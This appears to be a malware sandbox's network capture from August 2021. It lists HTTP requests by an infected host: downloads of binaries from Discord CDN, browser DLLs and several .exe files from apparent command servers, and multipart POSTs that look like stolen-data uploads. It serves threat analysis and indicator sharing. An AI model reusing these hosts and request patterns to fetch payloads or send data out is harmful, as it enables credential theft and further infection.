Network Analysis

GET /brikitiki HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: telete.in

HTTP/1.1 200 OK Server: nginx/1.10.3 (Ubuntu) Date: Mon, 09 Aug 2021 00:40:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: stel_ssid=05560449fe9f6e198c_4157697230756028935; expires=Tue, 10 Aug 2021 00:40:47 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=35768000

GET /attachments/873891971998036042/873892046249799720/Jjdsdprkpedcmpxtmnbemyveeqogpvi HTTP/1.1 User-Agent: zipo Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:31 GMT Content-Type: application/octet-stream Content-Length: 541184 Connection: keep-alive CF-Ray: 67bcf0732f460fa8-ICN Accept-Ranges: bytes Age: 39637 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Jjdsdprkpedcmpxtmnbemyveeqogpvi ETag: "d91137a04260a6be86d42f02e520bf33" Expires: Tue, 09 Aug 2022 00:41:31 GMT Last-Modified: Sun, 08 Aug 2021 11:35:00 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1628422500004011 x-goog-hash: crc32c=NWHnhQ== x-goog-hash: md5=2RE3oEJgpr6G1C8C5SC/Mw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 541184 X-GUploader-UploadID: ADPycdsmjLWwQQkDULR29aKidJ6ZVYoPGlLszeAFqJMsYUJtZQzAQu5OW7MOc_c2VHqvakoLmiPGpIprMGyiG27Xz1w X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UE0%2Bew%2F52KwKnUB01V1jAYN7TZPYKjWKo99kfKGGlq8%2FElwHNVKQ4SC8sWGhMLduRFHa8giVOpc2qeaPkh42mPXTx1uyPSOqvUvmxWMdG3sZF%2BFRhN9kmFJ54Z%2F9N%2FslKvHaxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/873891971998036042/873892046249799720/Jjdsdprkpedcmpxtmnbemyveeqogpvi HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:31 GMT Content-Type: application/octet-stream Content-Length: 541184 Connection: keep-alive CF-Ray: 67bcf0735ba8a27f-ICN Accept-Ranges: bytes Age: 39637 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Jjdsdprkpedcmpxtmnbemyveeqogpvi ETag: "d91137a04260a6be86d42f02e520bf33" Expires: Tue, 09 Aug 2022 00:41:31 GMT Last-Modified: Sun, 08 Aug 2021 11:35:00 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1628422500004011 x-goog-hash: crc32c=NWHnhQ== x-goog-hash: md5=2RE3oEJgpr6G1C8C5SC/Mw== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 541184 X-GUploader-UploadID: ADPycdsmjLWwQQkDULR29aKidJ6ZVYoPGlLszeAFqJMsYUJtZQzAQu5OW7MOc_c2VHqvakoLmiPGpIprMGyiG27Xz1w X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D5yIYAoMf6Ghb0i7VmLjyRIh5kursg9U%2B6tbsD9W9InBgkuhdMqlLhsxf9gaGV%2FWa87h%2BBXruYmNmIB36SCLS62i6r8DN3O%2FMeUH%2BX5%2Buft9whVyWR4jTigj0QyFmo%2FUQ8zgAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/873891971998036042/873892704155742258/Bdojytwvbcgagbvmwkdspythmuhhgvq HTTP/1.1 User-Agent: zipo Host: cdn.discordapp.com

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:34 GMT Content-Type: application/octet-stream Content-Length: 118784 Connection: keep-alive CF-Ray: 67bcf0884af761be-ICN Accept-Ranges: bytes Age: 39856 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Bdojytwvbcgagbvmwkdspythmuhhgvq ETag: "0381b7281382fd974fa960f89f893d92" Expires: Tue, 09 Aug 2022 00:41:34 GMT Last-Modified: Sun, 08 Aug 2021 11:37:36 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1628422656855706 x-goog-hash: crc32c=csysJA== x-goog-hash: md5=A4G3KBOC/ZdPqWD4n4k9kg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 118784 X-GUploader-UploadID: ADPycdvIXpUkWjeJSZyfWJ4BTt0-LrHWc1qyxJj91g8gfT6YShT-Vjg7nazXs7TiOBc4CWTRyYcyKq3772EmBtJNFJRF5wU4cA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kiqf%2FAcTZG43j8gELnYHM5EuYUK7p8paA%2FMFTUpi%2Bo7LgbjmWfRndzY6TL0FzGjp6mgG7bd17Yxq1G7p4Yj4tGnc3FGIQ%2BARQlCc9fcC6IaNYRa%2Fv6rm8hpAnlUmbmQpQLH%2FwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

GET /attachments/873891971998036042/873892704155742258/Bdojytwvbcgagbvmwkdspythmuhhgvq HTTP/1.1 User-Agent: aswe Host: cdn.discordapp.com Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:34 GMT Content-Type: application/octet-stream Content-Length: 118784 Connection: keep-alive CF-Ray: 67bcf0886ff83519-ICN Accept-Ranges: bytes Age: 39856 Cache-Control: public, max-age=31536000 Content-Disposition: attachment;%20filename=Bdojytwvbcgagbvmwkdspythmuhhgvq ETag: "0381b7281382fd974fa960f89f893d92" Expires: Tue, 09 Aug 2022 00:41:34 GMT Last-Modified: Sun, 08 Aug 2021 11:37:36 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1628422656855706 x-goog-hash: crc32c=csysJA== x-goog-hash: md5=A4G3KBOC/ZdPqWD4n4k9kg== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 118784 X-GUploader-UploadID: ADPycdvIXpUkWjeJSZyfWJ4BTt0-LrHWc1qyxJj91g8gfT6YShT-Vjg7nazXs7TiOBc4CWTRyYcyKq3772EmBtJNFJRF5wU4cA X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=StPG9bwTgp93u%2B8niDnWH95C94bJltpSivLpI4e5yXOb9gjB9YXhVz6V45dZwAgu4K6fNbjn3mPFLvCaIM%2FIS2oBdd8bURVs1JaOSo%2FC67tIB8Vx7TEosqVLRJxmdgOOkNMWOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare

POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: danielmi.ac.ug Content-Length: 91 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:47 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Transfer-Encoding: chunked Content-Type: text/html

POST /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:48 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT ETag: "235d0-58a9fc6206c00" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 74.119.195.134

HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Aug 2021 00:40:48 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: *

GET //l/f/K-R3vHoBagrSXdgRybk2/6ba72ceafccb01eee167d7aa09187085192abe6a HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 74.119.195.134

HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Aug 2021 00:40:49 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Sat, 10 Jul 2021 15:08:06 GMT ETag: "60e9b7d6-dfcff" Accept-Ranges: bytes

POST /sqlite3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:49 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT ETag: "9d9d8-5561b116cc500" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream

POST /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:50 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT ETag: "519d0-58a9fc2e87280" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream

POST /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:51 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT ETag: "217d0-58a9fc4382400" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: application/octet-stream

POST /msvcp140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:51 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: application/octet-stream

POST /nss3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:52 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT ETag: "1303d0-58a9fc5a65a00" Accept-Ranges: bytes Content-Length: 1246160 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: application/octet-stream

POST /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:54 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT ETag: "14748-58a9fc6b90280" Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: application/octet-stream

GET //l/f/K-R3vHoBagrSXdgRybk2/1e6e1f91bf2fd97f39bb3794f23f972b62daf99d HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 74.119.195.134

HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Aug 2021 00:40:55 GMT Content-Type: application/octet-stream Content-Length: 2828315 Connection: keep-alive Last-Modified: Sat, 10 Jul 2021 15:08:05 GMT ETag: "60e9b7d5-2b281b" Accept-Ranges: bytes

POST /main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:55 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html

POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 24254 Host: danielmax.ac.ug Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:40:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html

POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV Content-Length: 22699 Host: 74.119.195.134

HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Aug 2021 00:41:15 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: *

GET /ac.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.215.113.77

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:16 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 05 Aug 2021 09:14:34 GMT ETag: "77c00-5c8cc58e93081" Accept-Ranges: bytes Content-Length: 490496 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream

GET /rc.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.215.113.77

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Sun, 08 Aug 2021 11:42:50 GMT ETag: "afc00-5c90ac4b9ca89" Accept-Ranges: bytes Content-Length: 719872 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: application/octet-stream

GET /ds1.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.215.113.77

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:20 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 05 Aug 2021 09:14:31 GMT ETag: "72400-5c8cc58bcec92" Accept-Ranges: bytes Content-Length: 467968 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream

GET /ds2.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.215.113.77

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:21 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 05 Aug 2021 09:14:26 GMT ETag: "71c00-5c8cc587af9e8" Accept-Ranges: bytes Content-Length: 465920 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: application/octet-stream

GET /cc.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.215.113.77

HTTP/1.1 200 OK Date: Mon, 09 Aug 2021 00:41:22 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Sun, 08 Aug 2021 11:42:56 GMT ETag: "afc00-5c90ac5120446" Accept-Ranges: bytes Content-Length: 719872 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: application/octet-stream